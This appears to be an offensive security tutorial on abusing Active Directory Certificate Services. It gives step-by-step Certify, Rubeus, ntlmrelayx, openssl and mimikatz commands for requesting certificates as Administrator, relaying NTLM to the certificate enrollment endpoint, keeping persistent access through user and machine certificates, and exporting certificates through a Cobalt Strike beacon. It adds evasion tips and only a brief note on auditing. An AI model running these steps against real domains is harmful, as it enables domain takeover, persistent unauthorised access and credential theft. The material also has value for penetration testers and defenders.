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Active Directory Certificate Services (AD CS) is a server role that allows you to build a public key infrastructure (PKI). Which can provide public key cryptography, digital certificates and digital signature capabilities.

Some practical applicatios include Secure/Multipurpose Internet Mail Extensions(S/MIME), secure wireless networks, VPNs, IPSec, Encrypting File System (EFS), smart card logon and SSL/TLS.

If a correct implmentation is given, can improve the security of an organisation by:

Misconfiguration of the AD CS can lead to domain privilege escalations or persistence.

Enumerating Certificate Authorities

To find AD CS Certificate Authorities (CA) in domain we can run certify with cas as parameter.

.\Certify.exe cas

We will see in te output the Root CAs and the Enrollment CAs, in addition to this we will see the certificate chain and the list of certificate templates for each CA, and some information about which principals are allowed to manage them.

Misconfigured Certificate Templates

Certify also allow us to find vulnerable CAs.

.\Certify.exe find /vulnerable

If a pincipal that you control had WriteOwner, WriteDacl, WriteProperty, Owner or Enrollment Rights and the CA is configured with ENROLLEE_SUPPLIES_SUBJECT and Client Authentication, we will be able to request a certificate for any user of the domain an use it to autenticate to the domain.

.\Certify.exe request /ca:dc.corp.local\ca-1 /template:TemplateName /altname:Administrator

Copy the whole certificate including the private key and save it to cert.pem. Then with openssl we can convert it to pfx format.

$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:

Note It is recommended to enter a password.

Convert cert.pfx into base64.

cat cert.pfx | base64 -w 0

And finally we can use Rubeus to request a TGT.

.\Rubeus asktgt /user:Administrator /certificate:<B64-CERT> /password:certificate-password /enctype:aes256 /nowrap

OPSEC Alert: Use /enctype:aes256 parameter to use AES256 and avoid RC4.

NTLM Relaying to ADCS HTTP Endpoints

Active Directory Certificate Service support HTTP enrolment methods and even inlcudes a GUI. The endpoint is often found in:


By default supports NTLM and Negotiate authentication methods so these endpoints are vulnerable to NTLM relay attacks. A common abuse method is to force a DC to authenticate to an attacker controlled location, relay the request to the CA and obtain the certificate for that DC, then use it to obtain a TGT.

Note: We can not relay the authentication back to the original machine, which means we can not PrintSpooler the DC if it contains the CA.

ntlmrelayx.py -t http://ip-addr/certsrv/certfnsh.asp -smb2support --adcs --no-http-server

Use one of the remote authentication methods to force a connection to our compromised server.


On the output of ntlmrelay we will see the base64 certificate of the machine account. After obtaining the TGT we can abuse S4U2self to obtain a TGS of CIFS service.

User Persistence

We can craft a certificate for later use if managerial approval is not required for certificate requests.

.\Certify.exe find /clientauth
.\Certify.exe find /clientauth /ca:dc.corp.local\ca-1

This will show every certificat template that has a suitable Extended Key Usage (EKU) for client authentication. We can request a certificate for our use with:

.\Certify.exe request /ca:dc.corp.local\ca-1 /template:User

This certificate will allow us to request a TGT with Rubeus, by default is valid for a year and will continue working even if the user changes their password.

Computer Persistence

Similar to User, machines are a special type of user in AD and can have their own certificates issued. The default template for computers is called Machines.

.\Certify.exe request /ca:dc.corp.local\ca-1 /template:Machine /machine

Note: The /machine parameters tells to Certify to auto-elevate to SYSTEM and assume the identity of the machine account.

AD CS Auditing

AD CS logging is not enabled by default, so it is unsurprisingly common for defenders to be blind to this activity in their domain.

Audit Certification Services must also be enalbed via GPO to Success or Failure depending on the tolerance of the organization.

Dumping Certificates

To enumerate certificates use Seatbelt.

beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe Certificates

Note: Ensure that the certificate is used for authentication.

We can dump certificates with mimikatz.

beacon> mimikatz crypto::certificates /export
beacon> mimikatz !crypto::certificates /systemstore:local_machine /export

NOTE: Mimikatz always export certificates with mimikatz as password.

Download the file and sync files from cobalt strike to your local machine.

beacon> download C:\Users\user\CURRENT_USER_My_0_User Example.pfx

Note : Go to View -> Downloads to sync files.

Encode in base64 the .pfx file.

cat CURRENT_USER_My_0_User\ Example.pfx | base64 -w0

And finally use it to request a TGT.